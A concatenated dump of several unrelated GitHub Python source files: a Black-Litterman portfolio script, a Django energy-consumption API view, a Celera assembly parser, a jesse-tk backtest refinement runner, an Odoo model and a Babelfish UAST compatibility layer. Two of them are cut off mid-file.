views\neta = np.array([1, -1]) # parameters for qualitative views\nlam = 1.2 # average risk-aversion level\ntau_hl = 1386 # half-life parameter\nv = np.array([[1, - 1, 0], [0, 0, 1]]) # pick matrix\nw = np.array([1/3, 1/3, 1/3]) # market-weighted portfolio\n\n# ## [Step 0](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step00): Upload data\n\npath = '~/databases/global-databases/equities/db_stocks_SP500/'\ndata = pd.read_csv(path + 'db_stocks_sp.csv', index_col=0, header=[0, 1])\n\n# ## [Step 1](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step01): Compute time series of returns\n\nn_ = len(w) # market dimension\nr_t = data.pct_change().iloc[1:, :n_].values # returns\n\n# ## [Step 2](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step02): Compute the sample mean and the exponential decay sample covariance\n\nt_ = len(r_t)\np_t_tau_hl = exp_decay_fp(t_, tau_hl) # exponential decay probabilities\nmu_hat_r, sig2_hat_r = meancov_sp(r_t, p_t_tau_hl) # sample mean and covariance\n\n# ## [Step 3](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step03): Compute prior predictive performance parameters\n\n# +\n# expectation in terms of market equilibrium\nmu_r_equil = 2 * lam * sig2_hat_r @ w\n\ntau = t_ # uncertainty level in the reference model\nmu_m_pri = mu_r_equil\nsig2_m_pri = (1 / tau) * sig2_hat_r\ncv_pri_pred = sig2_hat_r + sig2_m_pri\n# -\n\n# ## [Step 4](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step04): Compute vectors quantifying the views\n\ni = v @ mu_r_equil + eta * np.sqrt(np.diag(v @ cv_pri_pred @ v.T))\nsig2_view = ((1 - c) / c) * (v @ sig2_m_pri @ v.T)\n\n# ## [Step 5](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step05): Compute effective rank corresponding to the pick matrix\n\n# +\n\ndef eff_rank(s2):\n lam2_n, _ = np.linalg.eig(s2)\n wn = lam2_n / np.sum(lam2_n)\n return np.exp(- wn @ np.log(wn))\n\ncr_i = cov_2_corr(v @ sig2_m_pri @ v.T * 1 / c)[0]\neff_rank = eff_rank(cr_i)\n# -\n\n# ## [Step 
6](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step06): Compute posterior predictive performance parameters\n\nmu_m_pos, cv_pos_pred = black_litterman(mu_m_pri, sig2_hat_r, tau, v, i,\n sig2_view)\n\n# ## [Step 7](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step07): Compute posterior predictive performance parameters in the case of uninformative views\n\n# +\n# compute vector quantifying the views in covariance\nsig2_unifview = ((1 - c_uninf) / c_uninf) * v @ sig2_m_pri @ v.T\n\nmu_m_pos, cv_pos_pred = black_litterman(mu_m_pri, sig2_hat_r, tau, v,\n i, sig2_unifview)\n# -\n\n# ## [Step 8](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step08): Compute full-confidence posterior predictive performance parameters\n\nmu_r_sure_bl = mu_m_pri + sig2_hat_r @ v.T @ \\\n np.linalg.solve(v @ sig2_hat_r @ v.T, i - v @ mu_m_pri)\nsig2_r_sure_bl = (1 + 1 / tau) * sig2_hat_r - (1 / tau) * sig2_hat_r @ v.T\\\n @ np.linalg.solve(v @ sig2_hat_r @ v.T, v @ sig2_hat_r)\n\n\n# ## [Step 9](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step09): Compare posterior parameters from point views\n\n# +\nk_ = len(v) # view variables dimension\nv_point = v\nz_point = i\n\nmu_r_point, sig2_r_point = min_rel_entropy_normal(mu_m_pri, sig2_hat_r,\n v_point, z_point, v_point,\n np.zeros((k_)))\n# -\n\n# ## [Step 10](https://www.arpm.co/lab/redirect.php?permalink=s_bl_equilibrium_ret-implementation-step10): Compute posterior parameters from distributional views (Minimum Relative Entropy)\n\n# +\nv_mre = v\nv_sig_mre = np.eye(n_)\nimre = i\nsig2viewmre = sig2_hat_r\n\nmu_r_mre, sig2_r_mre = min_rel_entropy_normal(mu_m_pri, sig2_hat_r, v_mre,\n imre, v_sig_mre, sig2viewmre)\n","repo_name":"neerav1985/ARPM","sub_path":"Python/scripts/sources/s_bl_equilibrium_ret.py","file_name":"s_bl_equilibrium_ret.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"40711775598","text":"import calendar\r\nfrom datetime import datetime, timedelta\r\n\r\nfrom rest_framework import generics, status\r\nfrom rest_framework.response import Response\r\n\r\nfrom .models import WattConsume\r\nfrom .serializers import OutputSerializer\r\n\r\n\r\ndef daily_consume(td):\r\n return_data = []\r\n for i in range(24):\r\n consume_last = WattConsume.objects.filter(\r\n meter_date__year=td.year,\r\n meter_date__month=td.month,\r\n meter_date__day=td.day,\r\n meter_date__hour=i,\r\n ).last()\r\n consume_first = WattConsume.objects.filter(\r\n meter_date__year=td.year,\r\n meter_date__month=td.month,\r\n meter_date__day=td.day,\r\n meter_date__hour=i,\r\n ).first()\r\n td_hour = td + timedelta(hours=i)\r\n active_energy_last = (\r\n consume_last.active_energy if consume_last is not None else 0\r\n )\r\n active_energy_first = (\r\n consume_first.active_energy if consume_first is not None else 0\r\n )\r\n total_consume = active_energy_last - active_energy_first\r\n hour_consume = {\r\n \"meter_date\": td_hour.isoformat(\" \", \"seconds\"),\r\n \"value\": total_consume,\r\n }\r\n return_data.append(hour_consume)\r\n return return_data\r\n\r\n\r\ndef weekly_consume(td):\r\n return_data = []\r\n week_day = td.weekday()\r\n for i in range(7):\r\n consume_last = WattConsume.objects.filter(\r\n meter_date__year=td.year,\r\n meter_date__month=td.month,\r\n meter_date__day=td.day - week_day + i,\r\n ).last()\r\n 
consume_first = WattConsume.objects.filter(\r\n meter_date__year=td.year,\r\n meter_date__month=td.month,\r\n meter_date__day=td.day - week_day + i,\r\n ).first()\r\n td_hour = td + timedelta(days=i - week_day)\r\n active_energy_last = (\r\n consume_last.active_energy if consume_last is not None else 0\r\n )\r\n active_energy_first = (\r\n consume_first.active_energy if consume_first is not None else 0\r\n )\r\n total_consume = active_energy_last - active_energy_first\r\n hour_consume = {\r\n \"meter_date\": td_hour.isoformat(\" \", \"seconds\"),\r\n \"value\": total_consume,\r\n }\r\n return_data.append(hour_consume)\r\n return return_data\r\n\r\n\r\ndef monthly_consume(td):\r\n total_days = calendar.monthrange(td.year, td.month)\r\n return_data = []\r\n print(total_days)\r\n for i in range(1, total_days[-1] + 1):\r\n consume_last = WattConsume.objects.filter(\r\n meter_date__year=td.year, meter_date__month=td.month, meter_date__day=i\r\n ).last()\r\n consume_first = WattConsume.objects.filter(\r\n meter_date__year=td.year, meter_date__month=td.month, meter_date__day=i\r\n ).first()\r\n td_hour = td.replace(day=i)\r\n active_energy_last = (\r\n consume_last.active_energy if consume_last is not None else 0\r\n )\r\n active_energy_first = (\r\n consume_first.active_energy if consume_first is not None else 0\r\n )\r\n total_consume = active_energy_last - active_energy_first\r\n hour_consume = {\r\n \"meter_date\": td_hour.isoformat(\" \", \"seconds\"),\r\n \"value\": total_consume,\r\n }\r\n return_data.append(hour_consume)\r\n return return_data\r\n\r\n\r\nclass DailyWattConsume(generics.ListAPIView):\r\n serializer_class = OutputSerializer\r\n queryset = WattConsume.objects.all()\r\n\r\n def get(self, request, *args, **kwargs):\r\n date_param = self.request.query_params.get(\r\n \"date\", datetime.now().strftime(\"%Y-%m-%d\")\r\n )\r\n period_param = self.request.query_params.get(\"period\", \"daily\")\r\n try:\r\n td = datetime.strptime(date_param, \"%Y-%m-%d\")\r\n\r\n if period_param == \"daily\":\r\n return Response(daily_consume(td=td))\r\n elif period_param == \"weekly\":\r\n return Response(weekly_consume(td=td))\r\n elif period_param == \"monthly\":\r\n return Response(monthly_consume(td=td))\r\n else:\r\n content = {\"meter_date\": None, \"value\": None}\r\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\r\n except Exception as e:\r\n print(e)\r\n content = {\r\n \"ERROR\": e.__str__(),\r\n }\r\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\r\n","repo_name":"JavierLGZ/watts_api","sub_path":"watts_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"1790996621","text":"##\n#Functions for working with Celera output\n##\n\nfrom collections import namedtuple\n\n\nFRG_t = namedtuple('FRG_t', [\"type\",\"ident\",\"container\",\"parent\",\"hang\",\"position\"])\nUnitig_t = namedtuple('Unitig_t', [\"id\", \"header\",\"frags\"])\n\ndef unitig_layout_iterator(string_iterable):\n '''Iterates over all of the unitigs\n unitig 1\n len 0\n cns\n qlt\n data.unitig_coverage_stat 1.000000\n data.unitig_microhet_prob 1.000000\n data.unitig_status X\n data.unitig_suggest_repeat F\n data.unitig_suggest_unique F\n data.unitig_force_repeat F\n data.unitig_force_unique F\n data.contig_status U\n data.num_frags 1071\n data.num_unitigs 0\n FRG type R ident 20549 container 0 parent 59207 hang 136 3755 position 11621 0\n FRG type R ident 72784 
container 20549 parent 20549 hang 290 -3884 position 7734 292\n '''\n \n it = iter(string_iterable)\n try:\n first = it.next()\n except StopIteration:\n first = None\n \n if not first or not first.startswith(\"unitig\"):\n raise Exception(\"No \\'unitig\\' at start of file\")\n \n unitig_id = first.strip().split()[1]\n header = \"\"\n frags = []\n while True:\n try:\n l = it.next()\n except StopIteration:\n l = None\n if not l or l.startswith(\"unitig\"):\n yield Unitig_t(unitig_id, header, frags)\n if not l:\n break\n unitig_id = l.strip().split()[1]\n header = \"\"\n frags = []\n else:\n if l.startswith(\"FRG\"):\n arr = l.strip().split()\n frags.append(FRG_t(arr[2],int(arr[4]),int(arr[6]),int(arr[8]),(int(arr[10]),\n int(arr[11])),\n (int(arr[13]),int(arr[14]))))\n else:\n header += l\n","repo_name":"jgurtowski/jbio","sub_path":"jbio/celera.py","file_name":"celera.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37958560510","text":"import importlib\nimport os\nimport sys\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom subprocess import PIPE, Popen\nfrom time import sleep, strftime, gmtime\nfrom timeit import default_timer as timer\nfrom jesse.routes import router\n\n\nimport jessetk.Vars as Vars\nimport jessetk.utils\nfrom jessetk import utils\nfrom jessetk.Vars import datadir\nfrom jessetk.Vars import refine_file_header\nimport json\nfrom millify import millify\nfrom importlib.metadata import version\n\nclass Refine:\n def __init__(self, hp_py_file, start_date, finish_date, eliminate, cpu, dd, mr, lpr, sharpe, profit, imcount, sortby='sharpe', full_reports=False):\n\n import signal\n signal.signal(signal.SIGINT, self.signal_handler)\n\n self.hp_py_file = hp_py_file\n self.start_date = start_date\n self.finish_date = finish_date\n self.cpu = cpu\n self.eliminate = eliminate\n self.dd = dd\n self.mr = mr\n self.lpr = lpr\n self.sharpe = sharpe\n self.profit = profit\n self.imcount = imcount\n self.sortby = sortby.replace('profit', 'total_profit')\n # Minimum is better for max lp rate, so we need to reverse the sort\n self.sort_reverse = sortby != 'lpr'\n self.fr = ' --full-reports' if full_reports else ''\n self.jessetkdir = datadir\n self.anchor = 'DNA!'\n self.sort_by = {'serenity': 12, 'sharpe': 13, 'calmar': 14}\n\n self.metrics = []\n\n self.n_of_iters = 0\n self.results = []\n self.sorted_results = []\n self.results_without_dna = []\n\n self.hps_module = None\n self.routes_template = None\n self.params = None\n self.n_of_params = None\n\n r = router.routes[0] # Read first route from routes.py\n self.exchange = r.exchange\n self.pair = r.symbol\n self.timeframe = r.timeframe\n self.strategy = r.strategy_name\n\n self.removesimilardnas = False\n\n self.ts = datetime.now().strftime(\"%Y%m%d %H%M%S\")\n self.filename = f'RefineHp-{self.exchange}-{self.pair}-{self.timeframe}--{start_date}--{finish_date}'\n\n self.report_file_name = f'{self.jessetkdir}/results/{self.filename}--{self.ts}.csv'\n self.log_file_name = f'{self.jessetkdir}/logs/{self.filename}--{self.ts}.log'\n\n def run(self):\n max_cpu = self.cpu\n processes = []\n commands = []\n results = []\n sorted_results = []\n iters_completed = 0\n self.import_dnas()\n iters = self.n_of_params\n self.n_of_iters = self.n_of_params\n index = 0 # TODO Reduce number of vars ...\n start = timer()\n\n while iters > 0:\n commands = []\n\n for _ in range(max_cpu):\n if iters > 0:\n hps = self.params[index]\n # hps = 
json.dumps(hps).replace('\"', '%')\n # print(f'parameters: {hps}')\n\n commands.append(\n f'jesse-tk backtest {self.start_date} {self.finish_date} --seq {hps}{self.fr}'\n )\n\n index += 1\n iters -= 1\n # print(f'commands: {commands}')\n processes = [Popen(cmd, shell=True, stdout=PIPE) for cmd in commands]\n\n # wait for completion\n for p in processes:\n p.wait()\n\n # Get thread's console output\n (output, err) = p.communicate()\n # debug\n # print(output.decode('utf-8'))\n try:\n print(err.decode('utf-8'))\n except:\n pass\n # exit()\n iters_completed += 1\n\n # Map console output to a dict\n metric = utils.get_metrics3(output.decode('utf-8'))\n metric['dna'] = metric['seq_hps']\n\n # print('Metrics decoded', len(metric))\n\n if metric not in results:\n results.append(deepcopy(metric))\n\n sorted_results_prelist = sorted(results, key=lambda x: float(x[self.sortby]), reverse=self.sort_reverse)\n # print(f'Sorted results: {sorted_results_prelist}')\n # print('Sorted results', len(sorted_results_prelist))\n\n # sleep(10)\n self.sorted_results = []\n\n if self.eliminate:\n for r in sorted_results_prelist:\n if float(r['sharpe']) > 0:\n self.sorted_results.append(r)\n else:\n self.sorted_results = sorted_results_prelist\n\n utils.clear_console()\n\n eta = ((timer() - start) / index) * (self.n_of_params - index)\n eta_formatted = strftime(\"%H:%M:%S\", gmtime(eta))\n\n print(\n f'{index}/{self.n_of_params}\\teta: {eta_formatted} | {self.pair} |'\n f' {self.timeframe} | {self.start_date} -> {self.finish_date} |'\n f\" Sort by {self.sortby} {'reversed' if self.sort_reverse else ''} |\"\n f\" Filters: MR% {self.mr}, DD% {self.dd}, LPR {self.lpr}, Sharpe {self.sharpe}, Profit: {self.profit} | Ver. {version('jesse-tk')}\")\n\n self.print_tops_formatted(n=30)\n\n # if self.eliminate:\n # self.save_dnas(self.sorted_results, self.dna_py_file)\n # else:\n # self.save_dnas(self.sorted_results)\n\n # self.save_seq(self.sorted_results)\n\n candidates = {\n r['dna']: r['dna']\n for r in self.sorted_results\n if r['max_dd'] > self.dd and r['max_margin_ratio'] < self.mr and r['lpr'] < self.lpr and r['sharpe'] > self.sharpe and r['total_profit'] > self.profit and r['insuff_margin_count'] <= self.imcount\n }\n\n print(f'\\n\\nCandidates: {len(candidates)}')\n seq_fn = f'SEQ-{self.pair}-{self.strategy}-{self.start_date}-{self.finish_date}.py'\n\n with open(seq_fn, 'w') as f:\n f.write(\"hps = \")\n f.write(json.dumps(candidates, indent=1))\n\n with open('last_seq_fn', 'w') as f:\n f.write(seq_fn)\n\n utils.create_csv_report(self.sorted_results,\n self.report_file_name, refine_file_header)\n\n\n def signal_handler(self, sig, frame):\n print('You pressed Ctrl+C!')\n sys.exit(0)\n\n def import_dnas(self):\n module_name = self.hp_py_file.replace('.\\\\', '').replace('.py', '')\n module_name = module_name.replace('/', '.').replace('.py', '')\n print(module_name)\n\n self.hps_module = importlib.import_module(module_name)\n importlib.reload(self.hps_module)\n self.params = [*self.hps_module.hps] # self.hps_module.hps.keys()\n self.n_of_params = len(self.params)\n print(f'Imported {self.n_of_params} parameters...')\n # print('self.params', self.params)\n # sleep(5)\n \n # v TODO Move to utils\n def print_tops_formatted(self, sorted_results=None, n:int = 50):\n if sorted_results is None:\n sorted_results = self.sorted_results\n \n print(\n jessetk.Vars.refine_console_formatter.format(*jessetk.Vars.refine_console_header1))\n print(\n jessetk.Vars.refine_console_formatter.format(*jessetk.Vars.refine_console_header2))\n\n 
for r in sorted_results[:n]:\n p = r\n # Replace None with empty string\n for k, v in p.items():\n if v is None:\n p[k] = ''\n\n # p = {}\n # # make a copy of r dict but round values if they are floats\n # for k, v in r.items():\n # try:\n # if type(v) is float and v > 999999:\n # p[k] = millify(v, 2)\n # elif type(v) is float and abs(v) > 999:\n # p[k] = round(v)\n # else:\n # p[k] = v\n # except:\n # p[k] = v\n\n # for i in range(len(r)):\n # if isinstance(r[i], float) and r[i] > 999999:\n # p.append(millify(round(r[i]), 2)) # '{:.2f}'.format(r[i])\n # # elif isinstance(r[i], float) and r[i] > 1000:\n # # p.append(round(r[i], 2))\n # else:\n # p.append(r[i])\n\n print(\n jessetk.Vars.refine_console_formatter.format(\n p['dna'],\n p['total_trades'],\n p['n_of_longs'],\n p['n_of_shorts'],\n p['total_profit'],\n p['max_margin_ratio'],\n p['pmr'],\n p['lpr'],\n p['insuff_margin_count'],\n p['max_dd'],\n p['annual_return'],\n p['win_rate'],\n p['serenity'],\n p['sharpe'],\n p['calmar'],\n p['win_strk'],\n p['lose_strk'],\n p['largest_win'],\n p['largest_lose'],\n p['n_of_wins'],\n p['n_of_loses'],\n p['paid_fees'],\n p['market_change']))\n\n # def print_tops_formatted(self):\n # print(\n # Vars.refine_console_formatter.format(*Vars.refine_console_header1))\n # print(\n # Vars.refine_console_formatter.format(*Vars.refine_console_header2))\n\n # for r in self.sorted_results[:25]:\n \n # p = {}\n # # make a copy of r dict but round values if they are floats\n # for k, v in r.items():\n # if type(v) is float and v > 999999:\n # p[k] = millify(v, 2)\n # elif type(v) is float and abs(v) > 999:\n # p[k] = round(v)\n # else:\n # p[k] = v\n\n # # for i in range(len(r)):\n # # if isinstance(r[i], float) and r[i] > 999999:\n # # p.append(millify(round(r[i]), 2)) # '{:.2f}'.format(r[i])\n # # # elif isinstance(r[i], float) and r[i] > 1000:\n # # # p.append(round(r[i], 2))\n # # else:\n # # p.append(r[i])\n\n # print(\n # Vars.refine_console_formatter.format(\n # p['dna'],\n # p['total_trades'],\n # p['n_of_longs'],\n # p['n_of_shorts'],\n # p['total_profit'],\n # p['max_dd'],\n # p['annual_return'],\n # p['win_rate'],\n # p['serenity'],\n # p['sharpe'],\n # p['calmar'],\n # p['win_strk'],\n # p['lose_strk'],\n # p['largest_win'],\n # p['largest_lose'],\n # p['n_of_wins'],\n # p['n_of_loses'],\n # p['paid_fees'],\n # p['market_change']))\n\n def save_dnas(self, sorted_results, dna_fn=None):\n\n if not dna_fn:\n dna_fn = f'{self.jessetkdir}/dnafiles/{self.pair} {self.start_date} {self.finish_date}.py'\n\n jessetk.utils.remove_file(dna_fn)\n\n with open(dna_fn, 'w', encoding='utf-8') as f:\n self.write_dna_file(f, sorted_results)\n\n def write_dna_file(self, f, sorted_results):\n f.write('dnas = [\\n')\n\n for srr in sorted_results:\n for dnac in self.dnas:\n if srr['dna'] == dnac[0]:\n f.write(str(dnac) + ',\\n')\n\n f.write(']\\n')\n f.flush()\n os.fsync(f.fileno())\n","repo_name":"ysdede/jesse-tk","sub_path":"jessetk/RefineSeq.py","file_name":"RefineSeq.py","file_ext":"py","file_size_in_byte":11860,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"16"} +{"seq_id":"27110056915","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\n\nclass ref_po_pp(models.Model):\n _name = 'tjara.ref_po_pp' # Ref purchase order _ product package\n \n name = fields.Char(string='ref po pp', store=True, readonly=True)\n product_package_id = fields.Many2one('tjara.product_package', ondelete='cascade', required=True, 
index=True)\n purchase_order_id = fields.Many2one('tjara.purchase_order', ondelete='cascade', required=True, index=True)\n \n qte = fields.Integer(string='Number Package', required=True)\n qte_prpk = fields.Float(related='product_package_id.qte', store=True, digits=(12, 3), help=\"Qte or Nbr per package\", string=\"Qte ou Nbr\", readonly=True)\n unity = fields.Selection(related='product_package_id.package_id.unity', store=True, string=\"Unity\", readonly=True)\n qte_prpk_unity = fields.Char(string=\"Qte or Nbr / Unity\", store=True, compute=\"_compute_qte_prpk_unity\")\n qte_total = fields.Integer(string='Total Quantity', compute='_compute_qte_total', store=True)\n qte_total_unity = fields.Char(string=\"Total Quantity\", compute=\"_compute_qte_total_unity\", store=True)\n \n @api.constrains('product_package_id', 'purchase_order_id')\n def check_qte(self):\n if(rec.qte < 1):\n raise ValidationError(\"Please set a valid quantity : %s\" % rec.qte)\n \n \n @api.constrains('qte')\n @api.multi\n def check_qte(self):\n for rec in self:\n if(rec.qte < 1):\n raise ValidationError(\"Please set a valid quantity : %s\" % rec.qte)\n\n @api.depends('qte_prpk', 'qte')\n @api.multi\n def _compute_qte_total(self):\n for rec in self:\n if(isinstance(rec.qte, int))and(isinstance(rec.qte_prpk, float)):\n rec.qte_total = rec.qte * rec.qte_prpk\n \n @api.multi\n @api.depends('qte', 'qte_prpk', 'unity')\n def _compute_qte_total_unity(self):\n for rec in self:\n if((rec.unity)and(isinstance(rec.qte_total, int))):\n rec.qte_total_unity = str(rec.qte * rec.qte_prpk) + \" \" + rec.unity\n \n @api.multi\n @api.depends('qte_prpk', 'unity')\n def _compute_qte_prpk_unity(self):\n for rec in self:\n if((rec.unity)and(isinstance(rec.qte_prpk, float))and(rec.qte_prpk > 0)):\n rec.qte_prpk_unity = str(rec.qte_prpk) + str(rec.unity) + \" / Package\"","repo_name":"ZiedHf/tjara","sub_path":"models/ref_po_pp.py","file_name":"ref_po_pp.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72450104968","text":"\"\"\"\nThis file provides a compatibility layer with the old UAST V1 (or python-client\nv2) API. 
You can see a summary of that API here:\n\nhttps://github.com/bblfsh/python-client/blob/c17d9cb6cd3e55ad150bd1d62a1de2e228d7db04/README.md\n\nNote that this won't translate the XPath queries from the old projection to the new use;\neven when using this module you're expected to use expressions matching the new\nprojection.\n\nNote that since this is a pure Python translation layer, some performance\nimpact is to be expected.\n\"\"\"\nimport os\nimport sys\nfrom typing import Union, List, Any, Optional\n\nimport grpc\n\nimport bblfsh.client as newbbl\nfrom bblfsh import role_id, role_name\nfrom bblfsh.node import Node\nfrom bblfsh.node_iterator import NodeIterator\nfrom bblfsh.result_context import ResultContext\nfrom bblfsh.aliases import (\n ParseRequest, ParseResponse, DriverStub, ProtocolServiceStub,\n VersionRequest, SupportedLanguagesRequest, ModeType,\n Mode, VersionResponse, DESCRIPTOR\n)\nfrom bblfsh.pyuast import uast, iterator as native_iterator\nfrom bblfsh.tree_order import TreeOrder\n\nprint(\"Warning: using deprecated bblfsh v1 compatibility layer.\", file=sys.stderr)\n\n\nclass WrongTypeException(Exception):\n \"\"\"\n This exception is raised when the API receives an unexpected type\n \"\"\"\n pass\n\n\nclass CompatParseResponse:\n \"\"\"\n This class emulates the API of the old ParseResponse object.\n \"\"\"\n def __init__(self, ctx: ResultContext, filename: str = \"\") -> None:\n self._res_context = ctx\n self._filename = filename\n\n @property\n def uast(self) -> Node:\n \"\"\"\n Returns the root Node.\n \"\"\"\n return self._res_context.uast\n\n @property\n def ast(self) -> Node:\n \"\"\"\n Returns the root Node. This is provided for compatibility, but\n since the type of result is now expecified using CompatBblfshClient.parse\n or parse_native, it'll return the same as uast().\n \"\"\"\n return self._res_context.ast\n\n @property\n def ctx(self) -> ResultContext:\n \"\"\"\n Returns the ResultContext of the response.\n \"\"\"\n return self._res_context\n\n @property\n def elapsed(self) -> int:\n \"\"\"\n Provided for compatibility, but since the new API's ParseResponse doesn't\n provide an elapsed time it'll always return -1.\n \"\"\"\n # FIXME(juanjux): check if the caller can get this, or measure it ourselves.\n return -1\n\n @property\n def language(self) -> str:\n \"\"\"\n Returns the language used for the request.\n \"\"\"\n return self._res_context.language\n\n @property\n def filename(self) -> str:\n \"\"\"\n Returns the filename used for the request.\n \"\"\"\n return self._filename\n\n @property\n def DESCRIPTOR(self) -> Any:\n \"\"\"\n Returns the gRPC context descriptor.\n \"\"\"\n return self._res_context.ctx.DESCRIPTOR\n\n @property\n def errors(selfs) -> List:\n \"\"\"\n Provided for compatibility. 
Since the new API will raise exceptions on errors,\n this just returns and empty array.\n \"\"\"\n # ParseResponse would have raised an exception on errors\n return []\n\n\nclass CompatBblfshClient:\n \"\"\"\n This emulates the methods and properties of the old BblfshClient.\n \"\"\"\n def __init__(self, endpoint: Union[str, grpc.Channel]) -> None:\n \"\"\"\n Connects to the specified grpc endpoint which can be specified either as\n a grpc Channel object or a connection string (like \"0.0.0.0:6432\").\n \"\"\"\n self._bblfsh_cli = newbbl.BblfshClient(endpoint)\n\n self._channel = self._bblfsh_cli._channel\n self._stub_v1 = self._bblfsh_cli._stub_v1\n self._stub_v2 = self._bblfsh_cli._stub_v2\n\n def _parse(self, filename: str, language: str = None, contents: str = None,\n timeout: float = None,\n mode: ModeType = Mode.Value('ANNOTATED')) -> CompatParseResponse:\n\n if timeout is not None:\n timeout = int(timeout)\n\n res = self._bblfsh_cli.parse(filename, language, contents,\n mode=mode, timeout=timeout)\n return CompatParseResponse(res, filename)\n\n def parse(self, filename: str, language: str = None, contents: str = None,\n timeout: float = None) -> CompatParseResponse:\n\n \"\"\"\n Parse the specified filename or contents and return a CompatParseResponse.\n \"\"\"\n\n return self._parse(filename, language, contents, timeout,\n Mode.Value('ANNOTATED'))\n\n def native_parse(self, filename: str, language: str = None,\n contents: str = None,\n timeout: float = None) -> CompatParseResponse:\n \"\"\"\n Same as parse() but the returned response will include only the native\n (non annotated) AST.\n \"\"\"\n\n return self._parse(filename, language, contents, timeout,\n Mode.Value('NATIVE'))\n\n def supported_languages(self) -> List[str]:\n \"\"\"\n Return a list of the languages that can be parsed by the connected\n endpoint (driver or bblfsh daemon).\n \"\"\"\n return self._bblfsh_cli.supported_languages()\n\n def version(self) -> VersionResponse:\n \"\"\"\n Returns the connected endpoint version.\n \"\"\"\n return self._bblfsh_cli.version()\n\n def close(self) -> None:\n \"\"\"\n Closes the connection to the endpoint.\n \"\"\"\n return self._bblfsh_cli.close()\n\n\nclass CompatNodeIterator:\n \"\"\"\n This emulates the API of the pre-v3 iterators.\n \"\"\"\n def __init__(self, nodeit: NodeIterator, only_nodes: bool = False) -> None:\n \"\"\"\n Creates a CompatNodeIterator compatibility object using a NodeIterator\n from the post-v3 API. 
If the only_nodes parameter is set to true,\n scalars and strings won't be included in the results.\n \"\"\"\n self._nodeit = nodeit\n self._only_nodes = only_nodes\n # Used to forward calls of the old Node object\n self._last_node: Optional[Node] = None\n\n def __iter__(self) -> 'CompatNodeIterator':\n return self\n\n def __next__(self) -> Node:\n next_val = next(self._nodeit)\n\n is_node = isinstance(next_val, Node)\n val = next_val.internal_node if is_node else next_val\n\n # Skip positions and non dicts/lists, the later if only_nodes = True\n skip = False\n if isinstance(val, dict):\n if \"@type\" not in val or val[\"@type\"] == \"uast:Positions\":\n skip = True\n elif self._only_nodes:\n skip = True\n\n if skip:\n val = self.__next__().internal_node\n\n ret_val = next_val if is_node else Node(value=val)\n self._last_node = ret_val\n return ret_val\n\n def filter(self, query: str) -> Optional['CompatNodeIterator']:\n \"\"\"\n Further filter the results using this iterator as base.\n \"\"\"\n if not self._last_node:\n return None\n\n return filter(self._last_node, query)\n\n @property\n def properties(self) -> dict:\n \"\"\"\n Returns the properties of the current node in the iteration.\n \"\"\"\n if isinstance(self._last_node, dict):\n return self._last_node.keys()\n else:\n return {}\n\n\ndef iterator(n: Union[Node, CompatNodeIterator, dict],\n order: TreeOrder = TreeOrder.PRE_ORDER) -> CompatNodeIterator:\n \"\"\"\n This function has the same signature as the pre-v3 iterator()\n call returning a compatibility CompatNodeIterator.\n \"\"\"\n\n if isinstance(n, CompatNodeIterator):\n return CompatNodeIterator(n._nodeit.iterate(order), only_nodes=True)\n elif isinstance(n, Node):\n nat_it = native_iterator(n.internal_node, order)\n return CompatNodeIterator(NodeIterator(nat_it), only_nodes=True)\n elif isinstance(n, dict):\n nat_it = native_iterator(n, order)\n return CompatNodeIterator(NodeIterator(nat_it, uast()), only_nodes=True)\n else:\n raise WrongTypeException(\n \"iterator on non node or iterator type (%s)\" % str(type(n))\n )\n\n\ndef filter(n: Node, query: str) -> CompatNodeIterator:\n \"\"\"\n This function has the same signature as the pre-v3 filter() returning a\n compatibility CompatNodeIterator.\n \"\"\"\n ctx = uast()\n return CompatNodeIterator(NodeIterator(ctx.filter(query, n.internal_node), ctx))\n\n\ndef filter_nodes(n: Node, query: str) -> CompatNodeIterator:\n \"\"\"\n Utility function. Same as filter() but will only filter for nodes (i. 
e.\n it will exclude scalars and positions).\n \"\"\"\n return CompatNodeIterator(filter(n, query)._nodeit, only_nodes=True)\n\n\nclass TypedQueryException(Exception):\n \"\"\"\n This exception will be raised when a query for a specific type (str, int, float...)\n returns a different type of more than one result.\n \"\"\"\n pass\n\n\ndef _scalariter2item(n: Node, query: str, wanted_type: type) -> Any:\n rlist = list(filter(n, query))\n\n if len(rlist) > 1:\n raise TypedQueryException(\"More than one result for %s typed query\" % str(type))\n\n value = rlist[0]\n if isinstance(value, Node):\n value = value.internal_node\n\n value_type = type(value)\n if wanted_type == float and value_type == int:\n value = float(value)\n\n if not isinstance(value, wanted_type):\n raise TypedQueryException(\"Typed query for type %s returned type %s instead\"\n % (str(wanted_type), str(type(value))))\n\n return wanted_type(value)\n\n\ndef filter_string(n: Node, query: str) -> str:\n \"\"\"\n Filter and ensure that the returned value is of string type.\n \"\"\"\n return _scalariter2item(n, query, str)\n\n\ndef filter_bool(n: Node, query: str) -> bool:\n \"\"\"\n Filter and ensure that the returned value is of type bool.\n \"\"\"\n return _scalariter2item(n, 